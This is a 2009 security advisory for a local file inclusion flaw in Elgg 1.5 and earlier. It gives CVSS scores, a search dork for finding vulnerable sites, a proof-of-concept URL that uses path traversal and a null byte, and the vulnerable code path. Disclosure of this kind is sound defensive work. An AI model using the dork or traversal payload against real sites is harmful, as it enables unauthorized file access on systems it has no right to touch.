elgg <= 1.5 (/_css/js.php) Local File Inclusion Vulnerability

2009.09.11
Credit: eLwaux
Risk: Low
Local: No
Remote: Yes
CWE: CWE-22


Ogólna skala CVSS: 4.3/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Brak
Wpływ na dostępność: Brak

Product: elgg.org Version: <= 1.5 Dork: "Powered by Elgg, the leading open source social networking platform" eLwaux(c)2009 UASC.org.UA POC: /_css/js.php?js=../../../../tmp/session_dir%00&viewtype=xD need: in table `datalists` must be record `simplecache_enabled` = 0 (default `simplecache_enabled ` = 1) Vulnerability Code: ----------------------------------------------------------------------- /_css/js.php: 33: $viewinput['view'] = 'js/' . $_GET['js']; 42: require_once(dirname(dirname(__FILE__)) . '/simplecache/view.php'); /simplecache/view.php: 26: $view = $viewinput['view']; 30: if (@mysql_select_db($CONFIG->dbname,$mysql_dblink)) { 48: if ($simplecache_enabled || $override) { 49: $filename = $dataroot . 'views_simplecache/' . md5($viewtype . $view); 51: $contents = file_get_contents($filename); 56: } else { 59: $contents = elgg_view($view); /lib/elgglib.php: 237: function elgg_view($view, .. 317: foreach($viewlist as $priority => $view) { 321: if (file_exists($view_location . "{$viewtype}/{$view}.php") && !include($view_location . "{$viewtype}/{$view}.php")) { -----------------------------------------------------------------------

Referencje:

http://www.milw0rm.com/exploits/9355
http://secunia.com/advisories/36147


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top